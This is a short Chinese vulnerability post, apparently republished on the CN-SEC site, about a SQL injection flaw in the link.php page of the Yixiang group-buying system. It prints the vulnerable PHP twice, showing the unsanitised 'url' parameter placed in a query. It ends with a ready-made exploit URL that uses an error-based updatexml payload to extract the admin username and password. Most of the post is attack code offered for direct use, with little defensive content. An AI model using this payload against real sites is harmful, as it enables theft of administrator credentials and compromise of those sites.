易想购物link.php sql注入漏洞

没穿底裤 2019年12月31日20:56:44评论370 views字数 650阅读2分10秒阅读模式
摘要

易想团购系统link.php页面内代码[php]if($_REQUEST['act']=='go') //link标签 go
{
$url = ($_REQUEST['url']); //直接取了url的值就带入了sql查询语句了
$link_item = $GLOBALS['db']->getRowCached("select * from ".DB_PREFIX."link where (url = '".$url."' or url = 'http://".$url."') and is_effect = 1"); //带入查询了
if($link_item)
{
if(check_ipop_limit(get_client_ip(),"Link",10,$link_item['id']))
$GLOBALS['db']->query("update ".DB_PREFIX."link set count = count + 1 where id = ".$link_item['id']);
$url = "http://".$url;
}
else
{
$url = APP_ROOT."/";
}
app_redirect($url);
}
[/php]

易想团购系统link.php页面内代码

[php]if($_REQUEST['act']=='go') //link标签 go
{
$url = ($_REQUEST['url']); //直接取了url的值就带入了sql查询语句了
$link_item = $GLOBALS['db']->getRowCached("select * from ".DB_PREFIX."link where (url = '".$url."' or url = 'http://".$url."') and is_effect = 1"); //带入查询了
if($link_item)
{
if(check_ipop_limit(get_client_ip(),"Link",10,$link_item['id']))
$GLOBALS['db']->query("update ".DB_PREFIX."link set count = count + 1 where id = ".$link_item['id']);
$url = "http://".$url;
}
else
{
$url = APP_ROOT."/";
}
app_redirect($url);
}
[/php]

EXP:
http://www.0day5.com/link.php?act=go&city=sanming&url=secer') and (updatexml(1,concat(0x3a,(select concat(adm_name,0x3a,adm_password) from jytuan_admin limit 1)),1))%23

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
没穿底裤
  • 本文由 发表于 2019年12月31日20:56:44
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   易想购物link.php sql注入漏洞http://cn-sec.com/archives/75201.html

发表评论

匿名网友 填写信息